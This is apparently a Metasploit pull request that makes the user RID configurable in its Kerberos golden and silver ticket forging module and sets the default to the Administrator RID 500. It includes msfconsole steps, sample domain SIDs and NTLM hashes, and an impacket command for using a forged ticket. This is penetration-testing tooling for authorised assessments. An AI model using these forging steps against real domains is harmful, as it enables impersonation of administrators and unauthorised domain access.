### PR TITLE
Allow `user_id` to be configurable in ticket forging

### DIFF
--- a/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md
@@ -20,15 +20,16 @@ Any system leveraging kerberos as a means of authentication e.g. Active Director
 ## Verification Steps
 
 1. Start msfconsole
-2. Do: `use auxiliary/admin/kerberos/forge_kerberos_ticket`
+2. Do: `use auxiliary/admin/kerberos/forge_ticket`
 3. Do: `set DOMAIN DW.LOCAL`
 4. Do: `set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962`
 5. Do: `set NTHASH 88E4D9FABAECF3DEC18DD80905521B29`
 6. Do: `set USER fake_user`
-7. Do: `set SPN MSSqlSvc/dc1.dw.local:1433` (Option only used for silver tickets)
-8. Do: `forge_silver` to generate a silver ticket or `forge_golden` for a golden ticket
-9. Use your ticket which will have been stored as loot with your chosen target
-10. Example usage in impacket:
+7. Do: `set USER_RID 500`
+8. Do: `set SPN MSSqlSvc/dc1.dw.local:1433` (Option only used for silver tickets)
+9. Do: `forge_silver` to generate a silver ticket or `forge_golden` for a golden ticket
+10. Use your ticket which will have been stored as loot with your chosen target
+11. Example usage in impacket:
     ```
     export KRB5CCNAME=/path/to/ticket
     python3 mssqlclient.py DW.LOCAL/fake_mysql@dc1.dw.local -k -no-pass
@@ -55,6 +56,7 @@ For golden ticket attacks, the following information is required:
 2. `DOMAIN_SID` - This is the Security Identifier for the system, i.e. `S-1-5-21-1266190811-2419310613-1856291569`
 3. `NTHASH` - The NTHASH for the krbtgt account, i.e. `767400b2c71afa35a5dca216f2389cd9`
 4. `USER` - This username will be stored within the forged ticket, this must be a user that exists in Active Directory
+5. `USER_RID` - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of `500`
 
 One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
 
@@ -129,7 +131,8 @@ For silver ticket attacks the following information is required:
 2. `DOMAIN_SID` This is the Security Identifier for the system, i.e. `S-1-5-21-1266190811-2419310613-1856291569`
 3. `NTHASH` - The NTHASH for the service or computer account, i.e. `767400b2c71afa35a5dca216f2389cd9`
 4. `USER` - This username will be stored within the forged ticket, unlike with Golden tickets - this can be a non-existent user
-5. `SPN` - The Service Principal name, i.e. `CIFS` for SMB access, or `MSSqlSvc/dc1.dw.local:1433`. Other examples can be seen by running `setspn -q */*` on the target
+5. `USER_RID` - The relative identifier(RID) for users will be stored within the forged ticket, i.e. Administrator accounts have a RID of `500`
+6. `SPN` - The Service Principal name, i.e. `CIFS` for SMB access, or `MSSqlSvc/dc1.dw.local:1433`. Other examples can be seen by running `setspn -q */*` on the target
 
 Example Service Principal Names:
 

--- a/lib/msf/core/exploit/remote/kerberos/client/pac.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/pac.rb
@@ -44,7 +44,7 @@ module Msf
             # @see Rex::Proto::Kerberos::Pac::Type
             def build_pac(opts = {})
               user_name = opts[:client_name] || ''
-              user_id = opts[:user_id] || Rex::Proto::Kerberos::Pac::DEFAULT_USER_SID
+              user_id = opts[:user_id] || Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID
               primary_group_id = opts[:group_id] || Rex::Proto::Kerberos::Pac::DOMAIN_USERS
               group_ids = opts[:group_ids] || [Rex::Proto::Kerberos::Pac::DOMAIN_USERS]
               domain_name = opts[:realm] || ''

--- a/lib/msf/core/exploit/remote/kerberos/ticket.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket.rb
@@ -7,7 +7,7 @@ module Msf
     class Remote
       module Kerberos
         module Ticket
-          def create_ticket(enc_key:, start_time:, end_time:, sname:, flags:, domain:, username:, domain_sid:, save_ccache: true)
+          def create_ticket(enc_key:, start_time:, end_time:, sname:, flags:, domain:, username:, user_id: Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID, domain_sid:, save_ccache: true)
             sname_principal = create_principal(sname)
             cname_principal = create_principal(username)
             group_ids = [
@@ -28,7 +28,7 @@ module Msf
               key_value: enc_key,
               checksum_enc_key: enc_key,
               secure_random_key: SecureRandom.hex(8),
-              user_id: 500,
+              user_id: user_id,
               group_ids: group_ids,
               checksum_type: Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5,
               client_name: username,

--- a/lib/rex/proto/kerberos/pac.rb
+++ b/lib/rex/proto/kerberos/pac.rb
@@ -25,10 +25,10 @@ module Rex
         SCHEMA_ADMINISTRATORS = 518
         ENTERPRISE_ADMINS = 519
         GROUP_POLICY_CREATOR_OWNERS = 520
-        DEFAULT_USER_SID = 1000
+        DEFAULT_ADMIN_RID = 500
+        DEFAULT_USER_RID = 1000
         NT_AUTHORITY_SID = 'S-1-5'
       end
     end
   end
 end
-

--- a/modules/auxiliary/admin/kerberos/forge_ticket.rb
+++ b/modules/auxiliary/admin/kerberos/forge_ticket.rb
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('USER', [ true, 'The Domain User' ]),
+        OptInt.new('USER_RID', [ true, "The Domain User's relative identifier(RID)", Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID]),
         OptString.new('NTHASH', [ true, 'The krbtgt/service nthash' ]),
         OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
         OptString.new('DOMAIN_SID', [ true, 'The Domain SID, Ex: S-1-5-21-1755879683-3641577184-3486455962']),
@@ -77,6 +78,7 @@ class MetasploitModule < Msf::Auxiliary
       flags: flags,
       domain: datastore['DOMAIN'],
       username: datastore['USER'],
+      user_id: datastore['USER_RID'],
       domain_sid: datastore['DOMAIN_SID']
     )
   end


### PR DESCRIPTION
Adds support to allow `user_rid` to be configurable in Kerberos ticket forging.

### Notes
- Updates some outdated info in the docs as well as updates to support `USER_RID`.
- Adds new constant to `lib/rex/proto/kerberos/pac.rb` for Administrator relative ID and makes use of that as the default for `USER_RID`.


## Verification

- [ ] Verify that the module works for you by following these [steps](https://github.com/rapid7/metasploit-framework/blob/3e65ba49ef7721a3f855576a0a5c301b64fe734d/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md#forge-golden-ticket)